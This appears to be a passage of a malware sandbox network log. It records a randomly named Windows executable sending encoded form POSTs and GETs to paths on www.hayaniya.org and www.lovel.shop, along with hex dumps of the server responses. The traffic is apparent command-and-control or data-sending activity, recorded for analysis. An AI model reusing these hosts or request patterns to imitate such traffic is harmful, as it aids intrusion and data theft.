                                                            Jan 11, 2025 04:17:30.351145029 CET1236INData Raw: 24 a4 5c 24 e5 28 21 31 f7 df 8d ad da 8e 97 4f c6 a1 4d e4 4d 0e ce 1b d6 cd a5 7e a0 40 2c 84 f0 42 3e ef 32 73 ad d9 d6 1b de d0 bc f5 66 db 54 a9 07 b1 e4 dd 4e b9 da 6a 2b b6 9b 19 b6 d6 6b eb b4 28 91 11 bb 89 51 ba 51 cd 1c 9b 41 2b 64 0b
                                                            Data Ascii: $\$(!1OMM~@,B>2sfTNj+k(QQA+d"%*p<<{MjL[5+)XTo$[u^TtfIHHBb+.CQ<D@/d6l;YoMeT-by!k=Nw\#}]JB6v})>\us
                                                            Jan 11, 2025 04:17:30.351274967 CET1236INData Raw: a5 66 8e 39 24 0a 1b 1c 87 50 ee 13 4e 24 06 3a 01 91 66 7a 62 fe 5e 48 f7 b7 92 c4 b1 d1 6f 0c 1a ad 2b d5 7c 50 9e c5 e8 34 da dd 46 f3 81 e1 11 ac 12 e8 72 60 60 17 e0 c0 ee 98 1d 39 49 ac 44 78 64 4b 82 8f 23 41 81 d6 07 06 5c 51 51 ee 43 22
                                                            Data Ascii: f9$PN$:fzb^Ho+|P4Fr``9IDxdK#A\QQC"(=ip9UDB3rpl3qDp;\~yA27;*@C..rvpqd3';wO.81a$\=k$nOQ@lw
                                                            Jan 11, 2025 04:17:30.351288080 CET1236INData Raw: 5f 24 42 3d 28 16 3d 2a d2 b4 f3 a0 88 ad 83 d1 ee 7d fd 63 63 e7 d8 97 22 e1 ee d1 d2 5c a9 cf 4f 42 9d 95 aa 58 51 e7 78 b6 92 06 67 a9 49 39 5a 2c f3 89 fe 75 49 7c bc 9e aa b0 cd 88 d2 f6 67 6b e5 9e 17 97 a1 83 e6 6a 8c 78 1e 40 8b d7 72 ce
                                                            Data Ascii: _$B=(=*}cc"\OBXQxgI9Z,uI|gkjx@r!rRU#XrSK&Yjt#kH{vEU5zBSi.u]bsfj@1U1W-R]MGzdE`EEJQpV~Y8t*Tgg3
                                                            Jan 11, 2025 04:17:30.351300001 CET1236INData Raw: 08 92 22 e1 2e 71 2b 7e 5f 52 17 35 0d a2 0d cc a8 cf 91 03 21 22 8d f5 75 37 1c 28 16 0e c5 0c 51 47 f0 b8 c2 4d 31 bd 96 1b 5d 59 84 f4 a3 88 54 9b 35 5c e2 e1 84 95 42 bc 90 44 c8 57 98 72 22 4b b6 ea b3 ab ed 73 e2 a3 15 88 19 7c 73 29 d8 38
                                                            Data Ascii: ".q+~_R5!"u7(QGM1]YT5\BDWr"Ks|s)8|GU$\Ivn"5jqI"4$&fTt`YaNg!ooKcbv$ l<c+^:Vj\)%r5vEUpU8D%6`wn
                                                            Jan 11, 2025 04:17:30.351351023 CET1236INData Raw: 18 3d dc b9 ca ca 4e 12 2b 11 6e ee bb e1 0f 70 8c 9c 80 32 57 12 5e 71 77 bb bd ca e6 ef 6f d9 d2 58 7d 22 cc 1d b8 11 ec fe 22 7d 93 be 9a 7f 65 a4 6f e6 8f e6 cf e6 4f d2 f3 6c fd 9d ec 3e 45 a3 38 b1 f3 0b d4 de db 95 22 72 c5 94 67 67 bd d9
                                                            Data Ascii: =N+np2W^qwoX}""}eoOl>E8"rgg;k>x?vsF}hx9CkwOrv+g7sTI<_~Jl<NJKA?@[<vBGcWVd5
                                                            Jan 11, 2025 04:17:30.351363897 CET1236INData Raw: 48 06 27 06 8c 35 2a 74 24 21 1c 09 ce 66 e6 61 c6 cc d8 ca 12 33 06 c6 16 50 5e b2 0f 87 d8 2c 06 a7 5e 02 b9 52 44 ae 98 02 c4 8d e0 d1 11 2c a3 30 e5 44 9a 35 50 f5 80 71 c2 0c ea 16 82 6e a3 41 ab d7 1e b5 ed 1a cc 65 57 c0 c5 68 19 5e a8 b9
                                                            Data Ascii: H'5*t$!fa3P^,^RD,0D5PqnAeWh^k5D2Q(~l0$s:!RA?K_Ib%7PJ*8D;H^oWIznW;NN~/;]wxuGw
                                                            Jan 11, 2025 04:17:30.355911016 CET1019INData Raw: 6a bc 64 a3 b8 75 17 95 d4 c0 a3 af 93 ea 50 6f 13 38 a0 fe 1a 50 bf 4a 5f 82 c8 5f 18 70 f8 4c 00 7f 05 2a ce e7 4f e7 ff be 86 fd ce 9d 3b 63 8b e3 13 d0 44 6e ba 74 d3 5c da 5b 9c 31 e0 a7 82 17 85 c5 ab e6 4e 45 60 e9 51 22 aa f1 16 d6 a6 07
                                                            Data Ascii: jduPo8PJ__pL*O;cDnt\[1NE`Q"GMl=0v4j*+2R+I pf~<4\0,0,XLz"AH"Rc_GKs>?$u,g<r5HcI#DN.q.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.749988192.185.147.100806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:32.136231899 CET1841OUTPOST /yf1h/ HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.hayaniya.org
                                                            Referer: http://www.hayaniya.org/yf1h/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 58 4b 55 63 68 6f 33 4b 35 4d 49 4d 56 49 6d 46 44 56 6e 44 74 2b 64 4d 75 75 5a 6d 54 79 2f 77 63 75 6b 68 6c 53 37 62 38 54 5a 2f 39 71 4f 41 54 47 4a 4e 44 75 46 46 6f 54 70 43 70 43 38 7a 2f 50 6b 6b 48 61 38 64 38 59 77 37 6c 76 67 6e 72 46 37 43 59 36 34 4a 56 45 4b 30 78 6e 59 67 69 71 7a 6d 4d 55 4e 30 39 51 33 62 52 46 41 56 53 75 32 6c 5a 75 4e 6d 6f 4c 36 75 49 53 6c 58 42 65 39 65 42 41 78 36 68 75 68 48 52 64 4b 36 74 47 77 6b 74 79 7a 76 61 72 38 65 4a 35 47 53 77 52 72 76 75 56 76 43 34 49 45 71 46 73 69 32 64 34 39 37 70 31 44 42 43 68 42 63 4b 44 65 4e 49 76 30 56 31 34 6f 64 79 54 63 67 69 6f 78 42 76 77 4a 34 2f 4f 4a 2b 4b 36 42 53 4b 75 75 6a 49 41 74 32 49 69 2f 55 41 6f 51 56 65 59 37 53 78 4a 68 64 38 2f 68 4d 4a 76 77 75 46 4d 7a 7a 51 6b 4e 50 4b 70 64 6d 66 58 6f 69 38 5a 34 70 53 73 50 6b 35 4f 30 44 59 6a 48 70 4e 32 65 6f 51 [TRUNCATED]
                                                            Data Ascii: MHJ0GXi=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvXKUcho3K5MIMVImFDVnDt+dMuuZmTy/wcukhlS7b8TZ/9qOATGJNDuFFoTpCpC8z/PkkHa8d8Yw7lvgnrF7CY64JVEK0xnYgiqzmMUN09Q3bRFAVSu2lZuNmoL6uISlXBe9eBAx6huhHRdK6tGwktyzvar8eJ5GSwRrvuVvC4IEqFsi2d497p1DBChBcKDeNIv0V14odyTcgioxBvwJ4/OJ+K6BSKuujIAt2Ii/UAoQVeY7SxJhd8/hMJvwuFMzzQkNPKpdmfXoi8Z4pSsPk5O0DYjHpN2eoQGsBuE+0lba0HSXIupUouCIbDqqxPMPQVoO27261vvxwGr/9ELU2ztWrf3UvwnT2r8ypnA63vdNd2qzv5izToH14G0imLOrFz9ta1vGvE+vaIRByAqXa2rjaxb12vs1PQD158WNp6QwHF74HTf8p53bl+zmsesthz58LoTHZ+qqQzt8OJfaPUHvLf10DqIXYGmuIsDXEH7yTDB3onUPWI3XzozCkI5tiuu4yynrsSZmhi0onfnEdopUt9a9+5mqRcK9mC7zPkNtuVaQhgkPNMUau/RHw8v/JtxXWPvatXO0RFX5cp4hB6c/gUQkgsJBkGGHhqG5AegFzr2FfmHnlNBWqAC3revUrvRt7nvWo7qHg/gMLNQRRBKmeOEtYtQnaEXqA+Ha13Osg78WCX9T0F3WqSDxtEDkwm/xH5r6sviLriRpkoNKwO80J3VM+vrAtiIP9iJ3IlzE9vl7UyhvOOk5yvCldiXUEPrPsWTN18rHJAZv17A+C0X0Gp0OmT8lhutcHQuaKoeFi2brgqhoWlrU8DZ5VsNQsd0YD1p8/hQjkzW59kN5PLhoyo44CyKFIxpc4Q+J+4hUF44dS1FqnQacX0QpC06TAWg5yzdPf+SXFY7CbTsduHatyqTPvj0T7zR/VfF2dNPyiA5vRKIBXTAZ2fIP1LbmeDmg [TRUNCATED]
                                                            Jan 11, 2025 04:17:32.930345058 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 03:17:32 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                            Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                            Jan 11, 2025 04:17:32.930368900 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                            Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                            Jan 11, 2025 04:17:32.930381060 CET448INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                            Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                            Jan 11, 2025 04:17:32.930438042 CET1236INData Raw: 56 39 ab 65 d6 67 c2 06 7d d7 51 7a 20 85 50 0f 11 82 05 50 24 49 4c 14 42 38 8e 88 a3 50 de 16 a1 f8 8b 04 4b 72 60 b4 1e 5c 94 d5 45 9d 03 a3 6b 75 2e 4c ea a0 ee 81 d1 b1 ba 97 24 b5 b3 a4 f6 85 49 ed 6c 5c fb 92 71 ad 3e 1a c1 de 7d 6b 74 61
                                                            Data Ascii: V9eg}Qz PP$ILB8PKr`\Eku.L$Il\q>}kta\#8xqfCbB Y_HTKDxzB]$y&mRrEzhDf%9+>]]Jz6Rm?$ns.]nG&:;J
                                                            Jan 11, 2025 04:17:32.930450916 CET1236INData Raw: 24 a4 5c 24 e5 28 21 31 f7 df 8d ad da 8e 97 4f c6 a1 4d e4 4d 0e ce 1b d6 cd a5 7e a0 40 2c 84 f0 42 3e ef 32 73 ad d9 d6 1b de d0 bc f5 66 db 54 a9 07 b1 e4 dd 4e b9 da 6a 2b b6 9b 19 b6 d6 6b eb b4 28 91 11 bb 89 51 ba 51 cd 1c 9b 41 2b 64 0b
                                                            Data Ascii: $\$(!1OMM~@,B>2sfTNj+k(QQA+d"%*p<<{MjL[5+)XTo$[u^TtfIHHBb+.CQ<D@/d6l;YoMeT-by!k=Nw\#}]JB6v})>\us
                                                            Jan 11, 2025 04:17:32.930598974 CET1236INData Raw: a5 66 8e 39 24 0a 1b 1c 87 50 ee 13 4e 24 06 3a 01 91 66 7a 62 fe 5e 48 f7 b7 92 c4 b1 d1 6f 0c 1a ad 2b d5 7c 50 9e c5 e8 34 da dd 46 f3 81 e1 11 ac 12 e8 72 60 60 17 e0 c0 ee 98 1d 39 49 ac 44 78 64 4b 82 8f 23 41 81 d6 07 06 5c 51 51 ee 43 22
                                                            Data Ascii: f9$PN$:fzb^Ho+|P4Fr``9IDxdK#A\QQC"(=ip9UDB3rpl3qDp;\~yA27;*@C..rvpqd3';wO.81a$\=k$nOQ@lw
                                                            Jan 11, 2025 04:17:32.930649996 CET1236INData Raw: 5f 24 42 3d 28 16 3d 2a d2 b4 f3 a0 88 ad 83 d1 ee 7d fd 63 63 e7 d8 97 22 e1 ee d1 d2 5c a9 cf 4f 42 9d 95 aa 58 51 e7 78 b6 92 06 67 a9 49 39 5a 2c f3 89 fe 75 49 7c bc 9e aa b0 cd 88 d2 f6 67 6b e5 9e 17 97 a1 83 e6 6a 8c 78 1e 40 8b d7 72 ce
                                                            Data Ascii: _$B=(=*}cc"\OBXQxgI9Z,uI|gkjx@r!rRU#XrSK&Yjt#kH{vEU5zBSi.u]bsfj@1U1W-R]MGzdE`EEJQpV~Y8t*Tgg3
                                                            Jan 11, 2025 04:17:32.930664062 CET328INData Raw: 08 92 22 e1 2e 71 2b 7e 5f 52 17 35 0d a2 0d cc a8 cf 91 03 21 22 8d f5 75 37 1c 28 16 0e c5 0c 51 47 f0 b8 c2 4d 31 bd 96 1b 5d 59 84 f4 a3 88 54 9b 35 5c e2 e1 84 95 42 bc 90 44 c8 57 98 72 22 4b b6 ea b3 ab ed 73 e2 a3 15 88 19 7c 73 29 d8 38
                                                            Data Ascii: ".q+~_R5!"u7(QGM1]YT5\BDWr"Ks|s)8|GU$\Ivn"5jqI"4$&fTt`YaNg!ooKcbv$ l<c+^:Vj\)%r5vEUpU8D%6`wn
                                                            Jan 11, 2025 04:17:32.930677891 CET1236INData Raw: 4a 44 9b 59 85 b5 e9 41 5e c7 1b f4 bc aa 64 03 ea ba c0 45 28 6c ca 40 aa 2e 56 18 51 17 60 eb cc c2 53 e4 1f a9 59 44 26 a6 1e 58 84 62 a2 14 e5 3e ec fd f0 de 17 89 50 0f 6c ec 1c fb 52 24 dc 3d 5a 9a 3a 74 a0 7f 72 9c d4 d1 8f 33 7d ad 7a 02
                                                            Data Ascii: JDYA^dE(l@.VQ`SYD&Xb>PlR$=Z:tr3}zQHDv=AI737p ;QJqEZtM"4\)"Q|}n3c-(dW184@obJEex9u(wG_'Y[
                                                            Jan 11, 2025 04:17:32.930705070 CET1236INData Raw: c2 df b3 db a4 af db b9 82 fe aa a0 17 9a f2 96 40 ed 1a 12 b5 0a fb f9 b7 55 49 6d 6a fb 12 66 00 3f 90 f1 3d 60 7f a5 c9 78 31 7f 32 ff 0a 9e ff 39 7f b6 24 63 6c 25 2c fb e6 f6 15 78 71 92 58 89 70 93 94 0d 7f 80 63 e4 04 94 b9 92 f0 8a bb 3b
                                                            Data Ascii: @UImjf?=`x129$cl%,xqXpc;VzB>u0w!5%tgG>T$w!Jb@^[~u7eYdv)<s-?|)&e~J;$JbVhl=&c"[=`%Tu`/_W
                                                            Jan 11, 2025 04:17:32.935276985 CET1236INData Raw: b9 e7 bb f9 a3 f4 f5 ad 91 d3 ed 77 af c4 4d 0d ba 4d 49 e8 24 af f4 2f 98 bb a6 24 34 e4 1c 7f fa a7 f4 fb f4 1c 28 79 7e 8b 0c 0c ae c4 40 bb 02 a8 00 a7 19 d0 8a e8 56 24 84 35 27 e8 c7 66 ee 6b 20 0a c8 32 d2 17 e9 5f 41 4f cf e6 8f 8c 1f 9b
                                                            Data Ascii: wMMI$/$4(y~@V$5'fk 2_AOvo0N@Qo6q<f"fM7gs|3<nnRmPJjSj&^ij^-[}$V"h9e$O]}"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.749989192.185.147.100806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:34.673593044 CET552OUTGET /yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2 HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:35.270965099 CET513INHTTP/1.1 301 Moved Permanently
                                                            Date: Sat, 11 Jan 2025 03:17:35 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.74999013.248.169.48806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:40.320976019 CET802OUTPOST /rxts/ HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.lovel.shop
                                                            Referer: http://www.lovel.shop/rxts/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 6f 6b 78 4d 6a 65 77 4e 6b 43 64 32 57 65 6b 37 75 32 57 38 62 33 74 59 43 55 36 71 51 51 79 53 52 75 49 69 31 6f 6c 45 4e 55 4e 74 37 38 6b 2f 37 30 67 6c 46 6c 72 54 50 33 31 43 76 4f 35 4a 53 64 4a 78 66 68 6c 6f 4d 75 78 4b 35 6c 4e 73 71 5a 74 61 54 50 72 6a 54 56 2f 75 41 56 67 63 64 75 6f 43 32 54 69 4a 31 78 2f 43 4f 41 65 44 50 50 59 71 64 6d 57 6a 4e 65 4a 75 56 66 79 48 4b 77 78 65 33 50 32 4d 75 31 42 7a 68 73 55 36 2f 51 51 6e 44 70 7a 50 78 31 30 45 39 4c 6f 78 34 48 39 44 4d 61 71 70 30 71 31 70 37 38 33 30 48 48 65 2b 52 4b 70 45 64 33 5a 69 6b 47 68 30 67 52 57 44 62 41 3d 3d
                                                            Data Ascii: MHJ0GXi=ZOC90mTtFQvaokxMjewNkCd2Wek7u2W8b3tYCU6qQQySRuIi1olENUNt78k/70glFlrTP31CvO5JSdJxfhloMuxK5lNsqZtaTPrjTV/uAVgcduoC2TiJ1x/COAeDPPYqdmWjNeJuVfyHKwxe3P2Mu1BzhsU6/QQnDpzPx10E9Lox4H9DMaqp0q1p7830HHe+RKpEd3ZikGh0gRWDbA==
                                                            Jan 11, 2025 04:17:40.763919115 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.74999113.248.169.48806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:42.866703033 CET822OUTPOST /rxts/ HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.lovel.shop
                                                            Referer: http://www.lovel.shop/rxts/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 57 53 53 4f 34 69 30 70 6c 45 42 30 4e 74 7a 63 6b 2b 32 55 67 69 46 6b 58 74 50 79 56 43 76 50 64 4a 53 59 31 78 66 51 6c 72 4e 2b 78 49 78 46 4e 75 6b 35 74 61 54 50 72 6a 54 56 72 51 41 56 59 63 63 66 59 43 35 57 65 47 75 52 2f 46 65 51 65 44 4c 50 59 75 64 6d 57 42 4e 66 46 55 56 61 32 48 4b 79 70 65 32 65 32 4e 6e 31 42 50 76 4d 55 71 35 44 31 5a 4d 4c 50 6f 2f 31 73 38 36 6f 67 42 77 52 38 68 57 34 6d 46 71 37 4e 53 2f 2b 54 43 51 68 44 4c 54 4c 74 63 51 56 74 44 37 78 45 65 74 44 33 48 4e 78 47 31 4b 54 37 6f 4f 61 76 79 64 6a 73 59 59 4e 78 51 51 31 6f 3d
                                                            Data Ascii: MHJ0GXi=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjWSSO4i0plEB0Ntzck+2UgiFkXtPyVCvPdJSY1xfQlrN+xIxFNuk5taTPrjTVrQAVYccfYC5WeGuR/FeQeDLPYudmWBNfFUVa2HKype2e2Nn1BPvMUq5D1ZMLPo/1s86ogBwR8hW4mFq7NS/+TCQhDLTLtcQVtD7xEetD3HNxG1KT7oOavydjsYYNxQQ1o=
                                                            Jan 11, 2025 04:17:43.321705103 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.74999213.248.169.48806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:45.421041965 CET1835OUTPOST /rxts/ HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.lovel.shop
                                                            Referer: http://www.lovel.shop/rxts/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 65 53 52 2f 59 69 31 4b 4e 45 50 55 4e 74 35 38 6b 46 32 55 67 7a 46 6c 2f 68 50 79 4a 53 76 4d 31 4a 54 39 35 78 4f 53 4e 72 48 2b 78 49 39 6c 4e 7a 71 5a 73 59 54 50 37 5a 54 56 37 51 41 56 59 63 63 63 41 43 77 6a 69 47 70 68 2f 43 4f 41 66 58 50 50 59 47 64 6d 65 72 4e 66 52 2b 53 75 43 48 4b 53 35 65 30 73 65 4e 6f 31 42 4a 69 73 56 31 35 44 4a 38 4d 4c 6a 6b 2f 32 77 53 36 72 41 42 67 67 68 39 48 6f 75 2f 34 37 42 33 2f 4e 2f 59 58 6a 44 59 65 49 4e 39 50 6d 52 30 33 42 70 6b 6f 44 62 50 5a 30 7a 46 63 67 33 70 49 72 44 46 5a 30 55 56 4b 6f 39 4f 45 55 37 4d 4e 56 78 63 78 43 73 53 50 6a 42 4c 48 6d 38 7a 5a 35 4c 4b 58 48 4a 79 4b 56 75 63 31 41 30 6e 44 32 47 66 47 51 4d 6c 63 63 48 39 6d 36 54 74 6f 72 65 6d 4d 49 73 4f 62 4a 43 69 4f 74 58 31 33 39 6f 33 6f 43 52 65 51 72 31 57 47 4a 6a 2f 65 52 76 41 46 77 4b 70 51 5a 37 41 2b 77 43 41 4c 33 [TRUNCATED]
